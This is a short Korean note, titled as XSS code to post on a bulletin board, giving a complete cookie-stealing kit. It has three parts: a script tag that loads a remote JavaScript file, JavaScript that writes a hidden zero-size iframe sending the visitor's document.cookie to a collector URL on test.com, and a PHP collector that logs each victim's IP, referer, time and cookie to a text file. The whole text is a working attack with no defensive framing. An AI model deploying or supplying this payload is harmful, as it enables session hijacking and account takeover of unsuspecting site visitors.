게시판에 올라가는 xss 코드
---------------------------------------------------------
<script src="http://test.com/hi.js"></script>
---------------------------------------------------------
hi.js
---------------------------------------------------------
document.write("<iframe src='http://test.com/hi.php?coo="+document.cookie+"' width=0 height=0></iframe>");
---------------------------------------------------------
hi.php
{
}
---------------------------------------------------------
<?
$coo=$_GET['coo'];
$fp=fopen("./cookie1.txt", "a++");
fputs($fp, "date: ".date("Y-m-d H:i:s",time()));
fputs($fp, "\n");
fputs($fp, "ip: ".$_SERVER['REMOTE_ADDR']);
fputs($fp, "\n");
fputs($fp, "HTTP_REFFERER: ".$_SERVER['HTTP_REFERER']);
fputs($fp, "\n");
fputs($fp, "cookie: $coo");
fputs($fp, "\n");
fputs($fp, "\n");
fputs($fp, "\n");
fclose($fp);
?>
----------------------------------------------------